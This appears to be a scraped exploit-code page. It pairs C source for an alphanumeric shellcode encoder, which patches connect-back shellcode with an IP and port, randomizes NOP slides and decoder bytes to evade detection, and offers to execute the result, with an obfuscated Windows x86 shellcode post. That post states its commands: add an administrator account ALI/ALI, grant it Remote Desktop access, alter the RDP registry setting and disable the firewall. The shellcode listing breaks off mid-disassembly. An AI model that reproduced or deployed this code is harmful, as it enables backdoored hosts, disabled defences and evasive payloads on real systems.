connect-back // | | ///* ////////// | | *((DWORD *)(p_shellcode+OFFSET_IP_ADDRESS)) = ip_address;///////////////// | | *((DWORD *)(p_shellcode+OFFSET_TCP_PORT_NUMBER)) = my_htonl(TCP_PORT_NUMBER);// | | *(p_shellcode+OFFSET_TCP_PORT_NUMBER) = (UCHAR)2; // | | #endif ////////////////////////////////////////// | | //*/ // | | //set decoder with 'random' nop slides // | | strncpy(decoder+offset_nop_slide1, //////////////////////////// | | shuffle(get_nop_slide(size_nop_slide1, 1), size_nop_slide1),// | | size_nop_slide1); // | | strncpy(decoder+offset_nop_slide2, // | | shuffle(get_nop_slide(size_nop_slide2, 2), size_nop_slide2),// | | size_nop_slide2); /////////////////////////////// | | // | | //set decoder with random initial key //////////////////////////////////////////// | | *(decoder+offset_imul_key) = get_random_alnum_value();// | | printf("initial key=0x%2X - %s\n", ////////////// | | (UCHAR)*(decoder+offset_imul_key), // | | is_alnum((UCHAR)*(decoder+offset_imul_key))?"valid":"invalid - not alphanumeric!!!"); // | | // | | 
////////////// | | // | | //set decoder with 'random' dword pushes for registers we won't use //////////////// | | *(decoder+OFFSET_PUSH_DWORD1) = get_random_alnum_push_dword_opcode(); // | | printf("push dword1=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD1), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD1))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD2) = get_random_alnum_push_dword_opcode(); // | | printf("push dword2=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD2), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD2))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD3) = get_random_alnum_push_dword_opcode(); // | | printf("push dword3=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD3), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD3))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD4) = get_random_alnum_push_dword_opcode(); // | | printf("push dword4=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD4), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD4))?"valid":"invalid - not alphanumeric!!!");// | | // | | //bugfix: this time after srand() :) // | | xor_al1=get_random_alnum_value(); // | | xor_al2=get_random_alnum_value(); // | | *(decoder+OFFSET_XOR_AL1_A) = xor_al1; // | | *(decoder+OFFSET_XOR_AL1_B) = xor_al1; // | | *(decoder+OFFSET_XOR_AL2_A) = xor_al2; // | | *(decoder+OFFSET_XOR_AL2_B) = xor_al2; // | | // | | memcpy(decoder+OFFSET_RANDOMIZED_DECODER_HEAD, ////// | | randomize_decoder_head(decoder, size_decoder, xor_al1, *(decoder+offset_jne_xor1)), // <---here-------------------------|---' SIZE_RANDOMIZED_DECODER_HEAD); ////// | //set first xor1 to random alnum value (this is the first byte of the encoded data) // | xor1 = get_random_alnum_value(); // | printf("xor1=0x%2X - %s\n", // | (UCHAR)xor1, // | is_alnum((UCHAR)xor1)?"valid":"invalid - not alphanumeric!!!"); // | 
///////////////////////////////////////////////////////// | RE_RUN: // | sprintf(alnum_shellcode, "%s",decoder); // | memset(temp_buf, 0, 3);/////////////////// | for(i=0; i<size; i++) // | { ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// | // each original byte is encoded into 3 alphanumeric bytes where first_byte*third_byte^second_byte==original_byte // | // third_byte is the next encoded original byte's first_byte // | // the first byte of the terminating key is the last byte's third_byte /////// | p_xor2_key=get_xor2_and_key_for_xor1_and_c(xor1, shellcode[i]);//get a list of second_byte and third_byte for first_byte// | if(!p_xor2_key) /////// | goto RE_RUN; // | p_xor2_key = choose_random_node(p_xor2_key);//choose a random combination//////////////////////////////////////////// | key=p_xor2_key->key; // | xor2=p_xor2_key->xor2; // | temp_buf[0] = xor1; // | temp_buf[1] = xor2; // | strcat(alnum_shellcode, temp_buf); // append it to our decoder // | xor1=key; // | free_p_xor2_key(p_xor2_key); // free the list // | } //get next original_byte // | //////////////////////// | if (terminating_key_exist(alnum_shellcode+sizeof(decoder), str_end_of_encoded_shellcode))// | { // | printf("error - terminating key found in encoded shellcode. 
running again to fix\n");// | goto RE_RUN; // | } ///////////////////////////////////////////////////// | *(UCHAR*)(alnum_shellcode+8) = key; // set the last key of the encoded data to be the first byte of the terminating string | *(UCHAR*)(alnum_shellcode+9) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| *(UCHAR*)(alnum_shellcode+10) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| *(UCHAR*)(alnum_shellcode+11) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| strncat(alnum_shellcode, // append the terminating string to the decoder+encoded shellcode | (UCHAR*)(alnum_shellcode+offset_terminating_key), ////////////////////////////// | 4); // | // | //bugfix: handle case of esp pointing to shellcode // | if (!strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp")) // | { // | // _asm{ // | // push esp; // | // pop eax; // | // xor al, 0x36; // | // xor al, 0x30; // | // } // | p_alnum_shellcode = malloc(strlen(alnum_shellcode)+1+6); // | memset(p_alnum_shellcode, 0, strlen(alnum_shellcode)+1+6); // | memcpy(p_alnum_shellcode+6, alnum_shellcode, strlen(alnum_shellcode)+1); // | p_alnum_shellcode[0] = 'T'; // | p_alnum_shellcode[1] = 'X'; // todo: randomize by using other registers than eax // | p_alnum_shellcode[2] = '4'; // and using other xor values // | p_alnum_shellcode[3] = '6'; // <-- (x+6) // | p_alnum_shellcode[4] = '4'; // // | p_alnum_shellcode[5] = '0'; // <-- x // | p_alnum_shellcode[8] = get_push_register_instruction("eax"); // | p_alnum_shellcode[9] = get_push_register_instruction("eax"); // | size_decoder += 6; // | } // | // | printf("encoded shellcode length: %d\n", strlen(alnum_shellcode)-size_decoder); // | printf("decoder length: %d\n%s\n", // | size_decoder, // | p_alnum_shellcode); // | // | printf("scanning alnum_shellcode for shellcode up to size bytes\n"); // | found_msg = 
scan_str_known_pattern(alnum_shellcode, shellcode, size); ///////// | if (found_msg) printf("shellcode found encoded in alnum_shellcode using %s.\n", found_msg); // | else printf("shellcode not found encoded in alnum_shellcode.\n"); /////////////////////////// | // | if (str_is_alnum(alnum_shellcode)) // | { // | printf("execute shellcode locally? (hit: y and press enter): ");// | if(tolower(getchar()) == 'y') // | { ///////////// | _asm // | { // | push p_alnum_shellcode; //////// | pop REGISTER_WITH_ADDRESS_OF_SHELLCODE;// <------------------------------------------------------------------------' //jump to head of decoder // jmp REGISTER_WITH_ADDRESS_OF_SHELLCODE;// } ////////////// } // } // else // { /////////////// printf("error non-alphanumeric shellcode\n"); // } ////////////////////////////// ///////// // return 0; ////// } // /////////////////// BOOL arg1_imul_arg2_xor_arg3(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UINT offset1, UINT offset2, UINT offset3) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]*alnum_str[offset+offset2])^alnum_str[offset+offset3])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]*alnum_str[offset+offset2+1])^alnum_str[offset+offset3+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } BOOL arg1_xor_arg2_imul_arg3(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UINT offset1, UINT offset2, UINT offset3) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]^alnum_str[offset+offset2])*alnum_str[offset+offset3])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else 
if((UCHAR)((alnum_str[offset+offset1+1]^alnum_str[offset+offset2+1])*alnum_str[offset+offset3+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } BOOL arg1_imul_key_xor_arg2(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UCHAR key, UINT offset1, UINT offset2) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]*key)^alnum_str[offset+offset2])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]*key)^alnum_str[offset+offset2+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length) { UCHAR *alnum = malloc(strlen(ALNUM_CHARSET)+1); UCHAR *temp_buf = malloc(255); strncpy(alnum, ALNUM_CHARSET, strlen(ALNUM_CHARSET)); alnum[strlen(ALNUM_CHARSET)]=0; memset(temp_buf, 0, 255); //this is not for production, just a poc... 
while(*alnum) { if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 0, 1)) { alnum--; strcat(temp_buf, "(buf[0]*'"); temp_buf[strlen(temp_buf)] = *alnum; strcat(temp_buf, "')^buf[1]"); return(temp_buf); } } alnum-=strlen(ALNUM_CHARSET); while(*alnum) { if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 1, 0)) { alnum--; printf("key = 0x%2X ('%c')\n", *alnum, *alnum); return("found pattern using: (buf[1]*key)^buf[0]\n"); } } if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 0, 1)) return("(buf[0]*0x30)^buf[1]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 1, 0)) return("(buf[1]*0x30)^buf[0]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 0, 1)) return("(buf[0]*0x10)^buf[1]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 1, 0)) return("(buf[1]*0x10)^buf[0]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2)) return("(buf[0]*buf[1])^buf[2]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1)) return("(buf[0]*buf[2])^buf[1]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0)) return("(buf[1]*buf[2])^buf[0]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2)) return("(buf[0]^buf[1])*buf[2]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1)) return("(buf[0]^buf[2])*buf[1]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0)) return("(buf[1]^buf[2])*buf[0]"); else return ""; } BOOL is_alnum(UCHAR c) { char *alnum = ALNUM_CHARSET; char search_c[2] = ""; search_c[0] = c; return((BOOL)strstr(alnum, search_c)); } BOOL str_is_alnum(UCHAR *str) { ULONG length; length = strlen(str); for(;length>0;length--) { if( 
!is_alnum(str[length-1]) ) return 0; } return 1; } UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index) { int xor_complement_1, xor_complement_2; UCHAR two_xor_complements[3]; for(xor_complement_1=0; xor_complement_1<MAX_BYTES; xor_complement_1++) { if (is_alnum((UCHAR)xor_complement_1)) { for(xor_complement_2=0; xor_complement_2<MAX_BYTES; xor_complement_2++) { if (is_alnum((UCHAR)xor_complement_2)) { if(byte == (xor ^ xor_complement_1 ^ xor_complement_2)) { two_xor_complements[0] = (UCHAR)xor_complement_1; two_xor_complements[1] = (UCHAR)xor_complement_2; } } } } } if(index == 0 || index == 1) return two_xor_complements[index]; else return (UCHAR)0; } BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key) { return (BOOL) strstr(alnum_shellcode, terminating_key); } DWORD ip_str_to_dw(UCHAR *str) { DWORD x[4]; int dwIpAddress; if (!str || MAX_IP_STR_LEN < strlen(str) || strlen(str) < MIN_IP_STR_LEN) return -1; sscanf(str, "%d.%d.%d.%d", &x[0],&x[1],&x[2],&x[3]); x[3] = x[3] > 255 ? -1 : (x[3] <<= 24); x[2] = x[2] > 255 ? -1 : (x[2] <<= 16); x[1] = x[1] > 255 ? -1 : (x[1] <<= 8); x[0] = x[0] > 255 ? 
-1 : (x[0] <<= 0); dwIpAddress = x[0]+x[1]+x[2]+x[3]; return dwIpAddress; } DWORD my_htonl(DWORD dw_in) { DWORD dw_out; *((UCHAR *)&dw_out+3) = *((UCHAR *)&dw_in+0); *((UCHAR *)&dw_out+2) = *((UCHAR *)&dw_in+1); *((UCHAR *)&dw_out+1) = *((UCHAR *)&dw_in+2); *((UCHAR *)&dw_out+0) = *((UCHAR *)&dw_in+3); return dw_out; } void free_p_xor2_key(struct xor2_key *node) { struct xor2_key *temp = 0; if(node) { temp = node->prev; while(node->next) { node=node->next; free(node->prev); } free(node); } if(temp) { while(temp->prev) { temp=temp->prev; free(temp->next); } free(temp); } } struct xor2_key *choose_random_node(struct xor2_key *head) { int num_nodes = 1, selected_node, i; struct xor2_key* tail = head; struct xor2_key* pn = NULL ; if (!head || !head->key) return 0; while(tail->next) { tail = tail->next; num_nodes++; } selected_node = rand()%num_nodes; for(i=0; i<selected_node; i++) head = head->next; return head; } struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c) { struct xor2_key *p_xor2_key, *p_xor2_key_head; char *alnum = ALNUM_CHARSET; UINT i=0, z=1, r=0, count=0; UCHAR xor2=0, x=0; p_xor2_key_head = p_xor2_key = malloc(sizeof(xor2_key)); p_xor2_key->prev = 0; p_xor2_key->next = 0; p_xor2_key->key = 0; p_xor2_key->xor2 = 0; for(i=0; alnum[i]; i++) { for(x=0; alnum[x];x++) { xor2 = alnum[x]; if (((UCHAR)(xor1 * alnum[i]) ^ xor2) == c) { p_xor2_key->xor2 = xor2; p_xor2_key->key = alnum[i]; p_xor2_key->next = malloc(sizeof(struct xor2_key)); p_xor2_key->next->prev = p_xor2_key; p_xor2_key = p_xor2_key->next; p_xor2_key->key=0; p_xor2_key->xor2=0; } } } if(!p_xor2_key->key) p_xor2_key->next = 0; if (p_xor2_key->prev) p_xor2_key = p_xor2_key->prev; else return 0; free(p_xor2_key->next); p_xor2_key->next=0; return p_xor2_key_head; } UCHAR *shuffle(UCHAR str[], UINT length) //length does not include terminating null. 
{ UINT last, randomNum; UCHAR temporary; UCHAR *output = malloc(length); memcpy(output, str, length); for (last = length; last > 1; last--) { randomNum = rand( ) % last; temporary = output[randomNum]; output[randomNum] = output[last-1]; output[last-1] = temporary; } memcpy(str, output, length); return output; }// taken from: http://www.warebizprogramming.com/text/cpp/section6/part8.htm UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) { UCHAR *prefix_substr, *substr, *suffix_substr, *output_str; UINT prefix_substr_len, suffix_substr_len; if(slide > substr_offset) { printf("you can't slide it that far back!\n"); return 0; } output_str = malloc(str_len); memset(output_str, 0 , str_len); suffix_substr_len = str_len-substr_len-substr_offset; suffix_substr = malloc(suffix_substr_len); memset(suffix_substr, 0, suffix_substr_len); prefix_substr_len = substr_offset; prefix_substr = malloc(prefix_substr_len); memset(prefix_substr, 0, prefix_substr_len); substr = malloc(substr_len); memset(substr, 0, substr_len); strncpy(substr, str+substr_offset, substr_len); strncpy(prefix_substr, str, prefix_substr_len); strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); strncpy(output_str, prefix_substr, prefix_substr_len-slide); strncpy(output_str+prefix_substr_len-slide, substr, substr_len); strncpy(output_str+prefix_substr_len-slide+substr_len, str+substr_offset-slide, slide); strncpy(output_str+prefix_substr_len-slide+substr_len+slide, str+substr_offset+substr_len, suffix_substr_len); free(prefix_substr); free(suffix_substr); free(substr); return output_str; } UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) { UCHAR *prefix_substr, *substr, *suffix_substr, *output_str; UINT prefix_substr_len, suffix_substr_len; if(slide > str_len-substr_len-substr_offset) { printf("you can't slide it that far forward!\n"); return 0; } output_str = malloc(str_len); 
memset(output_str, 0 , str_len); suffix_substr_len = str_len-substr_len-substr_offset; suffix_substr = malloc(suffix_substr_len); memset(suffix_substr, 0, suffix_substr_len); prefix_substr_len = substr_offset; prefix_substr = malloc(prefix_substr_len); memset(prefix_substr, 0, prefix_substr_len); substr = malloc(substr_len); memset(substr, 0, substr_len); strncpy(substr, str+substr_offset, substr_len); strncpy(prefix_substr, str, prefix_substr_len); strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); strncpy(output_str, prefix_substr, prefix_substr_len); strncpy(output_str+prefix_substr_len, suffix_substr, slide); strncpy(output_str+prefix_substr_len+slide, substr, substr_len); strncpy(output_str+prefix_substr_len+slide+substr_len, suffix_substr+slide, suffix_substr_len-slide); free(prefix_substr); free(suffix_substr); free(substr); return output_str; } UCHAR *get_nop_slide(UINT size, UINT slide) { //simple alnum nop slide generator UINT i, x, append_dec_eax = 0; UCHAR alnum_nop[][3] = { "AI", //inc ecx;dec ecx // (alnum_nop[0]) "BJ", //inc edx;dec edx // (alnum_nop[1]) "CK", //inc ebx;dec ebx // (alnum_nop[2]) "EM", //inc ebp;dec ebp // (alnum_nop[3]) "FN", //inc esi;dec esi // (alnum_nop[4]) "GO", //inc edi;dec edi // (alnum_nop[5]) [we don't care about eax value before the imul] "HG", //dec eax;inc edi // (alnum_nop[6]) --- not allowed in nop_slide_2 [instruction as it overwrites eax with result ] "HO", //dec eax;dec edi // (alnum_nop[7]) --- not allowed in nop_slide_2 [and we don't care about edi value at all. ] "DL", //inc esp;dec esp // (alnum_nop[8]) --- [todo: need to preserve stack state] >--. 
//we can freely inc/dec esp for now // "PX", //push eax;pop eax// (alnum_nop[9]) --- [todo: need to preserve stack state] >--| //but we need to take it into account // "QY", //push ecx;pop ecx// (alnum_nop[10]) ---[todo: need to preserve stack state] >--| //once we start pushing/poping to/from // "RZ", //push edx;pop edx// (alnum_nop[11]) ---[todo: need to preserve stack state] >--' //the stack. // | //TODO: <-----------------------------------------------------------------------------------' // push eax push eax push eax push ecx push edx // pop eax push ecx push ecx dec esp pop edx // push ecx pop ecx push edx inc esp push ecx // pop ecx pop eax inc esp pop ecx pop ecx // push edx push edx dec esp push eax push eax // pop edx pop edx pop edx inc esp pop eax // pop ecx dec esp . // pop eax pop eax . // push edx . // pop edx etc... }; UCHAR *nop_slide; nop_slide = malloc(size); memset(nop_slide, 0, size); if(size%2) { append_dec_eax = 1; size--; } for(i=0; i<(size/2); i++) { do x = rand()%(sizeof(alnum_nop)/3); while ((slide==2)&&(x==6||x==7)); strcat(nop_slide, alnum_nop[x]); } if(append_dec_eax) { strcat(nop_slide, slide==1?"H":rand()%2?"G":"O"); //dec eax or inc/dec edi - depends on which nop slide } return nop_slide; } UCHAR get_random_alnum_push_dword_opcode() { UCHAR alnum_push_dword_opcode[] = { 'P', //0x50 push eax 'Q', //0x51 push ecx 'R', //0x52 push edx 'S', //0x53 push ebx 'T', //0x54 push esp 'U', //0x55 push ebp 'V', //0x56 push esi 'W' //0x57 push edi }; return alnum_push_dword_opcode[rand()%sizeof(alnum_push_dword_opcode)]; } UCHAR get_random_alnum_value() { char alnum_values[] = ALNUM_CHARSET; return alnum_values[rand()%strlen(alnum_values)]; } UCHAR get_push_register_instruction(UCHAR *reg) { if (!strcmp(reg, "eax")) return 'P'; //0x50 push eax else if (!strcmp(reg, "ecx")) return 'Q'; //0x51 push ecx else if (!strcmp(reg, "edx")) return 'R'; //0x52 push edx else if (!strcmp(reg, "ebx")) return 'S'; //0x53 push ebx else if (!strcmp(reg, "esp")) 
return 'T'; //0x54 push esp else if (!strcmp(reg, "ebp")) return 'U'; //0x55 push ebp else if (!strcmp(reg, "esi")) return 'V'; //0x56 push esi else if (!strcmp(reg, "edi")) return 'W'; //0x57 push edi else return 0; } UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1) { UCHAR states[11] = {0,1,2,3,4,5,6,7,8,9,10}; UCHAR instructions[11][3]; UCHAR instruction_comments[11][28]; UINT i,c, state; UCHAR *output; UCHAR *random_states; UCHAR *p_state[5]; output = malloc(17); memset(output, 0, 17); memset(instructions, 0, 11*3); memset(instruction_comments, 0, 11*28); instructions[0][0] = '\x6a'; //j instructions[0][1] = xor_al1; // instructions[1][0] = '\x58'; //X instructions[2][0] = '\x34'; //4 instructions[2][1] = xor_al1; // instructions[3][0] = '\x48'; //H instructions[4][0] = '\x34'; //4 instructions[4][1] = jne_xor1; // instructions[5][0] = '\x30'; //0 instructions[5][1] = '\x42'; //B instructions[5][2] = size_decoder-1; // instructions[6][0] = '\x52'; //R instructions[7][0] = '\x52'; //R instructions[8][0] = '\x59'; //Y instructions[9][0] = '\x47'; //G instructions[10][0] = '\x43'; //C strcat(instruction_comments[0], "push XOR_AL1"); strcat(instruction_comments[1], "pop eax"); strcat(instruction_comments[2], "xor al, XOR_AL1"); strcat(instruction_comments[3], "dec eax"); strcat(instruction_comments[4], "xor al, JNE_XOR1"); strcat(instruction_comments[5], "xor byte ptr [edx+size], al"); strcat(instruction_comments[6], "push edx"); strcat(instruction_comments[7], "push edx"); strcat(instruction_comments[8], "pop ecx"); strcat(instruction_comments[9], "inc edi"); strcat(instruction_comments[10], "inc ebx"); do { memset(p_state, 0, sizeof(UCHAR*)*5); random_states = shuffle(states, 11); //.*0.*1.*2.*3.*4.*5 p_state[0] = memchr(random_states, 0, 11); if(p_state[0]) p_state[1] = memchr(p_state[0], 1, 11-(p_state[0]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 2, 11-(p_state[1]-random_states)); 
if(p_state[1]) p_state[1] = memchr(p_state[1], 3, 11-(p_state[1]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 4, 11-(p_state[1]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 5, 11-(p_state[1]-random_states)); //.*[67].*8 if(p_state[1]) { p_state[2] = memchr(random_states, 6, 11); p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); if(!p_state[3]) { p_state[2] = memchr(random_states, 7, 11); p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); } if(p_state[3]) { //.*1.*[67].*[67] if(p_state[2] && p_state[1] < p_state[2]) p_state[4] = memchr(p_state[2], *p_state[2]==6?7:6, 11-(p_state[2]-random_states)); //.*0.*[67].*8.*1 if(!p_state[4]) p_state[4] = memchr(p_state[0], 6, 11-(p_state[0]-random_states)); if(!p_state[4]) p_state[4] = memchr(p_state[0], 7, 11-(p_state[0]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 8, 11-(p_state[4]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 1, 11-(p_state[4]-random_states)); //.*[67].*8.*0.*1.*[67] if(!p_state[4]) p_state[4] = memchr(p_state[3], 0, 11-(p_state[3]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 1, 11-(p_state[3]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], *p_state[3]==6?7:6, 11-(p_state[4]-random_states)); } } } while (!p_state[4]); for (c=state=0; state<sizeof(states); state++) { i=0; while (instructions[random_states[state]][i] && i < 3) { output[c] = instructions[random_states[state]][i]; i++; c++; } } printf("======================\ndecoder head instruction order: %x %x %x %x %x %x %x %x %x %x %x\n", random_states[0], random_states[1], random_states[2], random_states[3], random_states[4], random_states[5], random_states[6], random_states[7], random_states[8], random_states[9], random_states[10] ); printf("%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n======================\n", instruction_comments[random_states[0]], 
instruction_comments[random_states[1]], instruction_comments[random_states[2]], instruction_comments[random_states[3]], instruction_comments[random_states[4]], instruction_comments[random_states[5]], instruction_comments[random_states[6]], instruction_comments[random_states[7]], instruction_comments[random_states[8]], instruction_comments[random_states[9]], instruction_comments[random_states[10]]); return output; }
  5. #Author: Ali Razmjoo #Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service] Obfuscated Shellcode Windows x86 [1218 Bytes].c /* #Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service] #length: 1218 bytes #Date: 13 January 2015 #Author: Ali Razmjoo #tested On: Windows 7 x86 ultimate WinExec => 0x7666e695 ExitProcess => 0x76632acf ==================================== Execute : net user ALI ALI /add net localgroup Administrators ALI /add NET LOCALGROUP "Remote Desktop Users" ALI /add reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f netsh firewall set opmode disable sc config termservice start= auto ==================================== Ali Razmjoo , ['[email protected]','[email protected]'] Thanks to my friends , Dariush Nasirpour and Ehsan Nezami C:\Users\Ali\Desktop>objdump -D shellcode.o shellcode.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 31 c0 xor %eax,%eax 2: 50 push %eax 3: b8 41 41 41 64 mov $0x64414141,%eax 8: c1 e8 08 shr $0x8,%eax b: c1 e8 08 shr $0x8,%eax e: c1 e8 08 shr $0x8,%eax 11: 50 push %eax 12: b9 6d 76 53 52 mov $0x5253766d,%ecx 17: ba 4d 59 32 36 mov $0x3632594d,%edx 1c: 31 d1 xor %edx,%ecx 1e: 51 push %ecx 1f: b9 6e 72 61 71 mov $0x7161726e,%ecx 24: ba 4e 33 2d 38 mov $0x382d334e,%edx 29: 31 d1 xor %edx,%ecx 2b: 51 push %ecx 2c: b9 6c 75 78 78 mov $0x7878756c,%ecx 31: ba 4c 34 34 31 mov $0x3134344c,%edx 36: 31 d1 xor %edx,%ecx 38: 51 push %ecx 39: b9 46 47 57 46 mov $0x46574746,%ecx 3e: ba 33 34 32 34 mov $0x34323433,%edx 43: 31 d1 xor %edx,%ecx 45: 51 push %ecx 46: b9 56 50 47 64 mov $0x64475056,%ecx 4b: ba 38 35 33 44 mov $0x44333538,%edx 50: 31 d1 xor %edx,%ecx 52: 51 push 
%ecx 53: 89 e0 mov %esp,%eax 55: bb 41 41 41 01 mov $0x1414141,%ebx 5a: c1 eb 08 shr $0x8,%ebx 5d: c1 eb 08 shr $0x8,%ebx 60: c1 eb 08 shr $0x8,%ebx 63: 53 push %ebx 64: 50 push %eax 65: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 6a: ba 33 52 64 59 mov $0x59645233,%edx 6f: 31 d3 xor %edx,%ebx 71: ff d3 call *%ebx 73: 31 c0 xor %eax,%eax 75: 50 push %eax 76: 68 41 41 64 64 push $0x64644141 7b: 58 pop %eax 7c: c1 e8 08 shr $0x8,%eax 7f: c1 e8 08 shr $0x8,%eax 82: 50 push %eax 83: b9 01 41 60 32 mov $0x32604101,%ecx 88: ba 48 61 4f 53 mov $0x534f6148,%edx 8d: 31 d1 xor %edx,%ecx 8f: 51 push %ecx 90: b9 28 47 0d 2f mov $0x2f0d4728,%ecx 95: ba 5b 67 4c 63 mov $0x634c675b,%edx 9a: 31 d1 xor %edx,%ecx 9c: 51 push %ecx 9d: b9 03 24 36 21 mov $0x21362403,%ecx a2: ba 62 50 59 53 mov $0x53595062,%edx a7: 31 d1 xor %edx,%ecx a9: 51 push %ecx aa: b9 34 41 15 18 mov $0x18154134,%ecx af: ba 5d 32 61 6a mov $0x6a61325d,%edx b4: 31 d1 xor %edx,%ecx b6: 51 push %ecx b7: b9 0c 05 1b 25 mov $0x251b050c,%ecx bc: ba 68 68 72 4b mov $0x4b726868,%edx c1: 31 d1 xor %edx,%ecx c3: 51 push %ecx c4: b9 2f 27 7b 13 mov $0x137b272f,%ecx c9: ba 5a 57 5b 52 mov $0x525b575a,%edx ce: 31 d1 xor %edx,%ecx d0: 51 push %ecx d1: b9 1c 2c 02 3e mov $0x3e022c1c,%ecx d6: ba 70 4b 70 51 mov $0x51704b70,%edx db: 31 d1 xor %edx,%ecx dd: 51 push %ecx de: b9 3d 2a 32 4c mov $0x4c322a3d,%ecx e3: ba 51 45 51 2d mov $0x2d514551,%edx e8: 31 d1 xor %edx,%ecx ea: 51 push %ecx eb: b9 23 5c 1c 19 mov $0x191c5c23,%ecx f0: ba 4d 39 68 39 mov $0x3968394d,%edx f5: 31 d1 xor %edx,%ecx f7: 51 push %ecx f8: 89 e0 mov %esp,%eax fa: bb 41 41 41 01 mov $0x1414141,%ebx ff: c1 eb 08 shr $0x8,%ebx 102: c1 eb 08 shr $0x8,%ebx 105: c1 eb 08 shr $0x8,%ebx 108: 53 push %ebx 109: 50 push %eax 10a: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 10f: ba 33 52 64 59 mov $0x59645233,%edx 114: 31 d3 xor %edx,%ebx 116: ff d3 call *%ebx 118: 31 c0 xor %eax,%eax 11a: 50 push %eax 11b: 68 41 41 64 64 push $0x64644141 120: 58 pop %eax 121: c1 e8 08 shr 